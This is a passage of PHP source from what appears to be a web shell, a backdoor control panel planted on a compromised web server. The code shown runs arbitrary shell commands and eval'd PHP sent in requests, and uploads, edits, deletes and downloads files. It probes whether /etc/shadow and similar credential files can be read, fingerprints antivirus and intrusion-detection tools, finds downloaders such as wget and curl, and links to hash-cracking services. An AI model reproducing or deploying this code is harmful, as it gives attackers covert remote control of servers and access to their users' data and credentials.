($GLOBALS[\'os\'] == \'win\') { \r\n foreach( range(\'a\',\'z\') as $drive ) \r\n if (is_dir($drive.\':\\\\\')) \r\n $drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \'; \r\n } \r\n echo \'<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd\'.($GLOBALS[\'os\'] == \'win\'?\'<br>Drives\':\'\').\'</span></td>\'. \r\n \'<td>:<nobr>\'.substr(@php_uname(), 0, 120).\' <a href="http://www.google.com/search?q=\'.urlencode(@php_uname()).\'" target="_blank">[Google]</a> <a href="\'.$millink.\'" target=_blank>[milw0rm]</a></nobr><br>:\'.$uid.\' ( \'.$user.\' ) <span>Group:</span> \'.$gid.\' ( \'.$group.\' )<br>:\'.@phpversion().\' <span>Safe mode:</span> \'.($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=<?=$color?><b>OFF</b></font>\').\' <a href=# onclick="g(\\\'Php\\\',null,null,\\\'info\\\')">[ phpinfo ]</a> <span>Datetime:</span> \'.date(\'Y-m-d H:i:s\').\'<br>:\'.viewSize($totalSpace).\' <span>Free:</span> \'.viewSize($freeSpace).\' (\'.(int)($freeSpace/$totalSpace*100).\'%)<br>:\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\'.$GLOBALS[\'home_cwd\'].\'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a><br>:\'.$drives.\'</td>\'. \r\n \'<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">\'.$opt_charsets.\'</optgroup></select><br><span>Server IP:</span><br>\'.gethostbyname($_SERVER["HTTP_HOST"]).\'<br><span>Client IP:</span><br>\'.$_SERVER[\'REMOTE_ADDR\'].\'</nobr></td></tr></table>\'. \r\n \'<table cellpadding=3 cellspacing=0 width=100%><tr>\'.$menu.\'</tr></table><div style="margin:5">\'; \r\n} \r\n\r\nfunction printFooter() { \r\n $is_writable = is_writable($GLOBALS[\'cwd\'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>"; \r\n?> \r\n</div> \r\n<table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%"> \r\n <tr> \r\n <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS[\'cwd\']);?>"><input type=submit value=">>"></form></td> \r\n <td><form onsubmit="g(\'FilesTools\',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td> \r\n </tr> \r\n <tr> \r\n <td><form onsubmit="g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td> \r\n <td><form onsubmit="g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td> \r\n </tr> \r\n <tr> \r\n <td><form onsubmit="g(\'Console\',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td> \r\n <td><form method=\'post\' ENCTYPE=\'multipart/form-data\'> \r\n <input type=hidden name=a value=\'FilesMAn\'> \r\n <input type=hidden name=c value=\'<?=htmlspecialchars($GLOBALS[\'cwd\'])?>\'> \r\n <input type=hidden name=p1 value=\'uploadFile\'> \r\n <input type=hidden name=charset value=\'<?=isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\'?>\'> \r\n <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td> \r\n </tr> \r\n\r\n</table> \r\n</div> \r\n</body></html> \r\n<?php \r\n} \r\nif ( !function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false) ) { function posix_getpwuid($p) { return false; } }\r\nif ( !function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false) ) { function posix_getgrgid($p) { return false; } }\r\nfunction ex($in) { \r\n $out = \'\'; \r\n if(function_exists(\'exec\')) { \r\n @exec($in,$out); \r\n $out = @join("\\n",$out); \r\n }elseif(function_exists(\'passthru\')) { \r\n ob_start(); \r\n @passthru($in); \r\n $out = ob_get_clean(); \r\n }elseif(function_exists(\'system\')) { \r\n ob_start(); \r\n @system($in); \r\n $out = ob_get_clean(); \r\n }elseif(function_exists(\'shell_exec\')) { \r\n $out = shell_exec($in); \r\n }elseif(is_resource($f = @popen($in,"r"))) { \r\n $out = ""; \r\n while(!@feof($f)) \r\n $out .= fread($f,1024); \r\n pclose($f); \r\n } \r\n return $out; \r\n} \r\nfunction viewSize($s) { \r\n if($s >= 1073741824) \r\n return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\'; \r\n elseif($s >= 1048576) \r\n return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\'; \r\n elseif($s >= 1024) \r\n return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\'; \r\n else \r\n return $s . \' B\'; \r\n} \r\n\r\nfunction perms($p) { \r\n if (($p & 0xC000) == 0xC000)$i = \'s\'; \r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\'; \r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\'; \r\n elseif (($p & 0x6000) == 0x6000)$i = \'b\'; \r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\'; \r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\'; \r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\'; \r\n else $i = \'u\'; \r\n $i .= (($p & 0x0100) ? \'r\' : \'-\'); \r\n $i .= (($p & 0x0080) ? \'w\' : \'-\'); \r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\')); \r\n $i .= (($p & 0x0020) ? \'r\' : \'-\'); \r\n $i .= (($p & 0x0010) ? \'w\' : \'-\'); \r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\')); \r\n $i .= (($p & 0x0004) ? \'r\' : \'-\'); \r\n $i .= (($p & 0x0002) ? \'w\' : \'-\'); \r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\')); \r\n return $i; \r\n} \r\nfunction viewPermsColor($f) { \r\n if (!@is_readable($f)) \r\n return \'<font color=#FF0000><b>\'.perms(@fileperms($f)).\'</b></font>\'; \r\n elseif (!@is_writable($f)) \r\n return \'<font color=white><b>\'.perms(@fileperms($f)).\'</b></font>\'; \r\n else \r\n return \'<font color=#00BB00><b>\'.perms(@fileperms($f)).\'</b></font>\'; \r\n} \r\nif(!function_exists("scandir")) { \r\n function scandir($dir) { \r\n $dh = opendir($dir); \r\n while (false !== ($filename = readdir($dh))) { \r\n $files[] = $filename; \r\n } \r\n return $files; \r\n } \r\n} \r\nfunction which($p) { \r\n $path = ex(\'which \'.$p); \r\n if(!empty($path)) \r\n return $path; \r\n return false; \r\n} \r\nfunction actionSecInfo() { \r\n printHeader(); \r\n echo \'<h1>Server security information</h1><div class=content>\'; \r\n function showSecParam($n, $v) { \r\n $v = trim($v); \r\n if($v) { \r\n echo \'<span>\'.$n.\': </span>\'; \r\n if(strpos($v, "\\n") === false) \r\n echo $v.\'<br>\'; \r\n else \r\n echo \'<pre class=ml1>\'.$v.\'</pre>\'; \r\n } \r\n } \r\n \r\n showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\')); \r\n showSecParam(\'Disabled PHP Functions\', ($GLOBALS[\'disable_functions\'])?$GLOBALS[\'disable_functions\']:\'none\'); \r\n showSecParam(\'Open base dir\', @ini_get(\'open_basedir\')); \r\n showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\')); \r\n showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\')); \r\n showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\'); \r\n $temp=array(); \r\n if(function_exists(\'mysql_get_client_info\')) \r\n $temp[] = "MySql (".mysql_get_client_info().")"; \r\n if(function_exists(\'mssql_connect\')) \r\n $temp[] = "MSSQL"; \r\n if(function_exists(\'pg_connect\')) \r\n $temp[] = "PostgreSQL"; \r\n if(function_exists(\'oci_connect\')) \r\n $temp[] = "Oracle"; \r\n showSecParam(\'Supported databases\', implode(\', \', $temp)); \r\n echo \'<br>\'; \r\n \r\n if( $GLOBALS[\'os\'] == \'nix\' ) { \r\n $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\'); \r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\'); \r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\'); \r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", \\"passwd\\")\'>[view]</a>":\'no\'); \r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"etc\\", \\"shadow\\")\'>[view]</a>":\'no\'); \r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\')); \r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\')); \r\n if(!$GLOBALS[\'safe_mode\']) { \r\n echo \'<br>\'; \r\n $temp=array(); \r\n foreach ($userful as $item) \r\n if(which($item)){$temp[]=$item;} \r\n showSecParam(\'Userful\', implode(\', \',$temp)); \r\n $temp=array(); \r\n foreach ($danger as $item) \r\n if(which($item)){$temp[]=$item;} \r\n showSecParam(\'Danger\', implode(\', \',$temp)); \r\n $temp=array(); \r\n foreach ($downloaders as $item) \r\n if(which($item)){$temp[]=$item;} \r\n showSecParam(\'Downloaders\', implode(\', \',$temp)); \r\n echo \'<br/>\'; \r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\')); \r\n showSecParam(\'HDD space\', ex(\'df -h\')); \r\n showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\')); \r\n } \r\n } else { \r\n showSecParam(\'OS Version\',ex(\'ver\')); \r\n showSecParam(\'Account Settings\',ex(\'net accounts\')); \r\n showSecParam(\'User Accounts\',ex(\'net user\')); \r\n } \r\n echo \'</div>\'; \r\n printFooter(); \r\n} \r\n\r\nfunction actionPhp() { \r\n if( isset($_POST[\'ajax\']) ) { \r\n $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true; \r\n ob_start(); \r\n eval($_POST[\'p1\']); \r\n $temp = "document.getElementById(\'PhpOutput\').style.display=\'\';document.getElementById(\'PhpOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\\n"; \r\n echo strlen($temp), "\\n", $temp; \r\n exit; \r\n } \r\n printHeader(); \r\n if( isset($_POST[\'p2\']) && ($_POST[\'p2\'] == \'info\') ) { \r\n echo \'<h1>PHP info</h1><div class=content>\'; \r\n ob_start(); \r\n phpinfo(); \r\n $tmp = ob_get_clean(); \r\n $tmp = preg_replace(\'!body {.*}!msiU\',\'\',$tmp); \r\n $tmp = preg_replace(\'!a:\\w+ {.*}!msiU\',\'\',$tmp); \r\n $tmp = preg_replace(\'!h1!msiU\',\'h2\',$tmp); \r\n $tmp = preg_replace(\'!td, th {(.*)}!msiU\',\'.e, .v, .h, .h th {$1}\',$tmp); \r\n $tmp = preg_replace(\'!body, td, th, h2, h2 {.*}!msiU\',\'\',$tmp); \r\n echo $tmp; \r\n echo \'</div><br>\'; \r\n } \r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) \r\n $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false; \r\n echo \'<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\\\'\\\');}return false;"><textarea name=code class=bigarea id=PhpCode>\'.(!empty($_POST[\'p1\'])?htmlspecialchars($_POST[\'p1\']):\'\').\'</textarea><input type=submit value=Eval style="margin-top:5px">\'; \r\n echo \' <input type=checkbox name=ajax value=1 \'.($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX</form><pre id=PhpOutput style="\'.(empty($_POST[\'p1\'])?\'display:none;\':\'\').\'margin-top:5px;" class=ml1>\'; \r\n if(!empty($_POST[\'p1\'])) { \r\n ob_start(); \r\n eval($_POST[\'p1\']); \r\n echo htmlspecialchars(ob_get_clean()); \r\n } \r\n echo \'</pre></div>\'; \r\n printFooter(); \r\n} \r\n\r\nfunction actionFilesMan() { \r\n printHeader(); \r\n echo \'<h1>File manager</h1><div class=content>\'; \r\n if(isset($_POST[\'p1\'])) { \r\n switch($_POST[\'p1\']) { \r\n case \'uploadFile\': \r\n if(!@move_uploaded_file($_FILES[\'f\'][\'tmp_name\'], $_FILES[\'f\'][\'name\'])) \r\n echo "Can\'t upload file!"; \r\n break; \r\n break; \r\n case \'mkdir\': \r\n if(!@mkdir($_POST[\'p2\'])) \r\n echo "Can\'t create new dir"; \r\n break; \r\n case \'delete\': \r\n function deleteDir($path) { \r\n $path = (substr($path,-1)==\'/\') ? $path:$path.\'/\'; \r\n $dh = opendir($path); \r\n while ( ($item = readdir($dh) ) !== false) { \r\n $item = $path.$item; \r\n if ( (basename($item) == "..") || (basename($item) == ".") ) \r\n continue; \r\n $type = filetype($item); \r\n if ($type == "dir") \r\n deleteDir($item); \r\n else \r\n @unlink($item); \r\n } \r\n closedir($dh); \r\n rmdir($path); \r\n } \r\n if(is_array(@$_POST[\'f\'])) \r\n foreach($_POST[\'f\'] as $f) { \r\n $f = urldecode($f); \r\n if(is_dir($f)) \r\n deleteDir($f); \r\n else \r\n @unlink($f); \r\n } \r\n break; \r\n case \'paste\': \r\n if($_SESSION[\'act\'] == \'copy\') { \r\n function copy_paste($c,$s,$d){ \r\n if(is_dir($c.$s)){ \r\n mkdir($d.$s); \r\n $h = opendir($c.$s); \r\n while (($f = readdir($h)) !== false) \r\n if (($f != ".") and ($f != "..")) { \r\n copy_paste($c.$s.\'/\',$f, $d.$s.\'/\'); \r\n } \r\n } elseif(is_file($c.$s)) { \r\n @copy($c.$s, $d.$s); \r\n } \r\n } \r\n foreach($_SESSION[\'f\'] as $f) \r\n copy_paste($_SESSION[\'cwd\'],$f, $GLOBALS[\'cwd\']); \r\n } elseif($_SESSION[\'act\'] == \'move\') { \r\n function move_paste($c,$s,$d){ \r\n if(is_dir($c.$s)){ \r\n mkdir($d.$s); \r\n $h = opendir($c.$s); \r\n while (($f = readdir($h)) !== false) \r\n if (($f != ".") and ($f != "..")) { \r\n copy_paste($c.$s.\'/\',$f, $d.$s.\'/\'); \r\n } \r\n } elseif(is_file($c.$s)) { \r\n @copy($c.$s, $d.$s); \r\n } \r\n } \r\n foreach($_SESSION[\'f\'] as $f) \r\n @rename($_SESSION[\'cwd\'].$f, $GLOBALS[\'cwd\'].$f); \r\n } \r\n unset($_SESSION[\'f\']); \r\n break; \r\n default: \r\n if(!empty($_POST[\'p1\']) && (($_POST[\'p1\'] == \'copy\')||($_POST[\'p1\'] == \'move\')) ) { \r\n $_SESSION[\'act\'] = @$_POST[\'p1\']; \r\n $_SESSION[\'f\'] = @$_POST[\'f\']; \r\n foreach($_SESSION[\'f\'] as $k => $f) \r\n $_SESSION[\'f\'][$k] = urldecode($f); \r\n $_SESSION[\'cwd\'] = @$_POST[\'c\']; \r\n } \r\n break; \r\n } \r\n echo \'<script>document.mf.p1.value="";document.mf.p2.value="";</script>\'; \r\n } \r\n $dirContent = @scandir(isset($_POST[\'c\'])?$_POST[\'c\']:$GLOBALS[\'cwd\']); \r\n if($dirContent === false) { echo \'Can\\\'t open this folder!\'; return; }\r\n global $sort; \r\n $sort = array(\'name\', 1); \r\n if(!empty($_POST[\'p1\'])) { \r\n if(preg_match(\'!s_([A-z]+)_(\\d{1})!\', $_POST[\'p1\'], $match)) \r\n $sort = array($match[1], (int)$match[2]); \r\n } \r\n?> \r\n<script> \r\n function sa() { \r\n for(i=0;i<document.files.elements.length;i++) \r\n if(document.files.elements[i].type == \'checkbox\') \r\n document.files.elements[i].checked = document.files.elements[0].checked; \r\n } \r\n</script> \r\n<table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'> \r\n<form name=files method=post> \r\n<?php \r\n echo "<tr><th width=\'13px\'><input type=checkbox onclick=\'sa()\' class=chkbx></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_name_".($sort[1]?0:1)."\\")\'>Name</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_size_".($sort[1]?0:1)."\\")\'>Size</a></th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_modify_".($sort[1]?0:1)."\\")\'>Modify</a></th><th>Owner/Group</th><th><a href=\'#\' onclick=\'g(\\"FilesMan\\",null,\\"s_perms_".($sort[1]?0:1)."\\")\'>Permissions</a></th><th>Actions</th></tr>"; \r\n $dirs = $files = $links = array(); \r\n $n = count($dirContent); \r\n for($i=0;$i<$n;$i++) { \r\n $ow = @posix_getpwuid(@fileowner($dirContent[$i])); \r\n $gr = @posix_getgrgid(@filegroup($dirContent[$i])); \r\n $tmp = array(\'name\' => $dirContent[$i], \r\n \'path\' => $GLOBALS[\'cwd\'].$dirContent[$i], \r\n \'modify\' => date(\'Y-m-d H:i:s\',@filemtime($GLOBALS[\'cwd\'].$dirContent[$i])), \r\n \'perms\' => viewPermsColor($GLOBALS[\'cwd\'].$dirContent[$i]),\r\n \'size\' => @filesize($GLOBALS[\'cwd\'].$dirContent[$i]), \r\n \'owner\' => $ow[\'name\']?$ow[\'name\']:@fileowner($dirContent[$i]), \r\n \'group\' => $gr[\'name\']?$gr[\'name\']:@filegroup($dirContent[$i]) \r\n ); \r\n if(@is_file($GLOBALS[\'cwd\'].$dirContent[$i])) \r\n $files[] = array_merge($tmp, array(\'type\' => \'file\')); \r\n elseif(@is_link($GLOBALS[\'cwd\'].$dirContent[$i])) \r\n $links[] = array_merge($tmp, array(\'type\' => \'link\')); \r\n elseif(@is_dir($GLOBALS[\'cwd\'].$dirContent[$i])&& ($dirContent[$i] != ".")) \r\n $dirs[] = array_merge($tmp, array(\'type\' => \'dir\')); \r\n } \r\n $GLOBALS[\'sort\'] = $sort; \r\n function cmp($a, $b) { \r\n if($GLOBALS[\'sort\'][0] != \'size\') \r\n return strcmp($a[$GLOBALS[\'sort\'][0]], $b[$GLOBALS[\'sort\'][0]])*($GLOBALS[\'sort\'][1]?1:-1); \r\n else \r\n return (($a[\'size\'] < $b[\'size\']) ? -1 : 1)*($GLOBALS[\'sort\'][1]?1:-1); \r\n } \r\n usort($files, "cmp"); \r\n usort($dirs, "cmp"); \r\n usort($links, "cmp"); \r\n $files = array_merge($dirs, $links, $files); \r\n $l = 0; \r\n foreach($files as $f) { \r\n echo \'<tr\'.($l?\' class=l1\':\'\').\'><td><input type=checkbox name="f[]" value="\'.urlencode($f[\'name\']).\'" class=chkbx></td><td><a href=# onclick="\'.(($f[\'type\']==\'file\')?\'g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'view\\\')">\'.htmlspecialchars($f[\'name\']):\'g(\\\'FilesMan\\\',\\\'\'.$f[\'path\'].\'\\\');"><b>[ \'.htmlspecialchars($f[\'name\']).\' ]</b>\').\'</a></td><td>\'.(($f[\'type\']==\'file\')?viewSize($f[\'size\']):$f[\'type\']).\'</td><td>\'.$f[\'modify\'].\'</td><td>\'.$f[\'owner\'].\'/\'.$f[\'group\'].\'</td><td><a href=# onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\',\\\'chmod\\\')">\'.$f[\'perms\'] \r\n .\'</td><td><a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'rename\\\')">R</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'touch\\\')">T</a>\'.(($f[\'type\']==\'file\')?\' <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'edit\\\')">E</a> <a href="#" onclick="g(\\\'FilesTools\\\',null,\\\'\'.urlencode($f[\'name\']).\'\\\', \\\'download\\\')">D</a>\':\'\').\'</td></tr>\'; \r\n $l = $l?0:1; \r\n } \r\n ?> \r\n <tr><td colspan=7> \r\n <input type=hidden name=a value=\'FilesMan\'> \r\n <input type=hidden name=c value=\'<?=htmlspecialchars($GLOBALS[\'cwd\'])?>\'> \r\n <input type=hidden name=charset value=\'<?=isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\'?>\'> \r\n <select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option><?php if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\'])){?><option value=\'paste\'>Paste</option><?php }?></select> <input type="submit" value=">>"></td></tr> \r\n </form></table></div> \r\n <?php \r\n printFooter(); \r\n} \r\n\r\nfunction actionStringTools() { \r\n if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));}} \r\n if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} \r\n if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= dechex(ord($p[$i]));return strtoupper($r);}} \r\n if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';for($i=0;$i<strlen($p);++$i)$r.= \'%\'.dechex(ord($p[$i]));return strtoupper($r);}} \r\n \r\n if(isset($_POST[\'ajax\'])) { \r\n $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true; \r\n ob_start(); \r\n if(function_exists($_POST[\'p1\'])) \r\n echo $_POST[\'p1\']($_POST[\'p2\']); \r\n $temp = "document.getElementById(\'strOutput\').style.display=\'\';document.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\\n"; \r\n echo strlen($temp), "\\n", $temp; \r\n exit; \r\n } \r\n printHeader(); \r\n echo \'<h1>String conversions</h1><div class=content>\'; \r\n $stringTools = array( \r\n \'Base64 encode\' => \'base64_encode\', \r\n \'Base64 decode\' => \'base64_decode\', \r\n \'Url encode\' => \'urlencode\', \r\n \'Url decode\' => \'urldecode\', \r\n \'Full urlencode\' => \'full_urlencode\', \r\n \'md5 hash\' => \'md5\', \r\n \'sha1 hash\' => \'sha1\', \r\n \'crypt\' => \'crypt\', \r\n \'CRC32\' => \'crc32\', \r\n \'ASCII to HEX\' => \'ascii2hex\', \r\n \'HEX to ASCII\' => \'hex2ascii\', \r\n \'HEX to DEC\' => \'hexdec\', \r\n \'HEX to BIN\' => \'hex2bin\', \r\n \'DEC to HEX\' => \'dechex\', \r\n \'DEC to BIN\' => \'decbin\', \r\n \'BIN to HEX\' => \'bin2hex\', \r\n \'BIN to DEC\' => \'bindec\', \r\n \'String to lower case\' => \'strtolower\', \r\n \'String to upper case\' => \'strtoupper\', \r\n \'Htmlspecialchars\' => \'htmlspecialchars\', \r\n \'String length\' => \'strlen\', \r\n ); \r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) \r\n $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false; \r\n echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;\'><select name=\'selectTool\'>"; \r\n foreach($stringTools as $k => $v) \r\n echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>"; \r\n echo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".htmlspecialchars(@$_POST[\'p2\'])."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\':\'\')."margin-top:5px\' id=\'strOutput\'>"; \r\n if(!empty($_POST[\'p1\'])) { \r\n if(function_exists($_POST[\'p1\'])) \r\n echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\'])); \r\n } \r\n echo"</pre></div>"; \r\n ?> \r\n <br><h1>Search for hash:</h1><div class=content> \r\n <form method=\'post\' target=\'_blank\' name="hf"> \r\n <input type="text" name="hash" style="width:200px;"><br> \r\n <input type="button" value="hashcrack.com" onclick="document.hf.action=\'http://www.hashcrack.com/index.php\';document.hf.submit()"><br> \r\n <input type="button" value="milw0rm.com" onclick="document.hf.action=\'http://www.milw0rm.com/cracker/search.php\';document.hf.submit()"><br> \r\n <input type="button" value="hashcracking.info" onclick="document.hf.action=\'https://hashcracking.info/index.php\';document.hf.submit()"><br> \r\n <input type="button" value="md5.rednoize.com" onclick="document.hf.action=\'http://md5.rednoize.com/?q=\'+document.hf.hash.value+\'&s=md5\';document.hf.submit()"><br> \r\n <input type="button" value="md5decrypter.com" onclick="document.hf.action=\'http://www.md5decrypter.com/\';document.hf.submit()"><br> \r\n </form> \r\n </div> \r\n <?php \r\n printFooter(); \r\n} \r\n\r\nfunction actionFilesTools() { \r\n if( isset($_POST[\'p1\']) ) \r\n $_POST[\'p1\'] = urldecode($_POST[\'p1\']); \r\n if(@$_POST[\'p2\']==\'download\') { \r\n if(is_file($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { \r\n ob_start("ob_gzhandler", 4096); \r\n header("Content-Disposition: attachment; filename=".basename($_POST[\'p1\'])); \r\n if (function_exists("mime_content_type")) { \r\n $type = @mime_content_type($_POST[\'p1\']); \r\n header("Content-Type: ".$type); \r\n } \r\n $fp = @fopen($_POST[\'p1\'], "r"); \r\n if($fp) { \r\n while(!@feof($fp)) \r\n echo @fread($fp, 1024); \r\n fclose($fp); \r\n } \r\n } elseif(is_dir($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { \r\n\r\n } \r\n exit; \r\n } \r\n if( @$_POST[\'p2\'] == \'mkfile\' ) { \r\n if(!file_exists($_POST[\'p1\'])) { \r\n $fp = @fopen($_POST[\'p1\'], \'w\'); \r\n if($fp) { \r\n $_POST[\'p2\'] = "edit"; \r\n fclose($fp); \r\n } \r\n } \r\n } \r\n printHeader(); \r\n echo \'<h1>File tools</h1><div class=content>\'; \r\n if( !file_exists(@$_POST[\'p1\']) ) { \r\n echo \'File not exists\'; \r\n printFooter(); \r\n return; \r\n } \r\n $uid = @posix_getpwuid(@fileowner($_POST[\'p1\'])); \r\n $gid = @posix_getgrgid(@fileowner($_POST[\'p1\'])); \r\n echo \'<span>Name:</span> \'.htmlspecialchars($_POST[\'p1\']).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\'; \r\n echo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\'; \r\n if( empty($_POST[\'p2\']) ) \r\n $_POST[\'p2\'] = \'view\'; \r\n if( is_file($_POST[\'p1\']) ) \r\n $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\'); \r\n else \r\n $m = array(\'Chmod\', \'Rename\', \'Touch\'); \r\n foreach($m as $v) \r\n echo \'<a href=# onclick="g(null,null,null,\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \'; \r\n echo \'<br><br>\'; \r\n switch($_POST[\'p2\']) { \r\n case \'view\': \r\n echo \'<pre class=ml1>\'; \r\n $fp = @fopen($_POST[\'p1\'], \'r\'); \r\n if($fp) { \r\n while( !@feof($fp) ) \r\n echo htmlspecialchars(@fread($fp, 1024)); \r\n @fclose($fp); \r\n } \r\n echo \'</pre>\'; \r\n break; \r\n case \'highlight\': \r\n if( is_readable($_POST[\'p1\']) ) { \r\n echo \'<div class=ml1 style="background-color: #e1e1e1;color:black;">\'; \r\n $code = 